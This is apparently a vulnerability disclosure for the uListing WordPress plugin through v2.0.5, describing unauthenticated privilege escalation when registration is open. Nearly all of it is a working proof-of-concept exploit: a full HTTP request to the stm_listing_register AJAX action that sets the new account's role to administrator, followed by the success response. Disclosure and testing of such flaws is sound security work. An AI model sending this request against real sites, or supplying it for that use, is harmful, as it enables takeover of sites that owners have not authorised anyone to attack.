An Unauthenticated Privilege Escalation vulnerability was discovered in the uListing plugin through v2.0.5 for WordPress. User registration must be allowed on the target website.
PoC | Unauthenticated Privilege Escalation | Request:
POST /wp-admin/admin-ajax.php?action=stm_listing_register HTTP/2
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/json;charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 205
{"login":"Visse","first_name":"Visse","last_name":"Visse","email":"[email protected]","role":"administrator","password":"admin","password_repeat":"admin","nonce":"ac88e123d8","custom_fields":{}}
PoC | Unauthenticated Privilege Escalation | Response:
{"errors":[],"message":"Registration completed successfully.","status":"success"}